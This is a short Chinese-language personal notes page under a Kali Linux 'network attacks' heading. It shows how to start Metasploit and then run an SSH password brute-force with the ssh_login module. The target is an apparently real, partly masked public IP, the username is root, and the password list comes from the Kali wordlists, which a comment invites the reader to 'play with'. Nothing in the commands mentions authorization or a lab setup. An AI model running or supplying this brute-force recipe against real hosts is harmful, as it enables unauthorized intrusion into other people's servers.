笔记笔记
  • Home
  • AI&ML
  • Example
  • Zoo
  • 关于
⌘ K
Kali Linux - 返回
网络攻击
Metasploit
最后更新时间:
Copyright © 2023-2024 | Powered by dumi | GuoDapeng | 冀ICP备20004032号-1 | 冀公网安备 冀公网安备 13024002000293号

TABLE OF CONTENTS

‌
‌
‌
‌

Metasploit

sudo su
msfdb init
# 启动
msfconsole

ssh 爆破

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 103.163.xxx.97
set USERNAME root
set PASS_FILE ssh_passwd.txt
run
# 这里有一些密码文件,可以现玩一下
# /usr/share/wordlists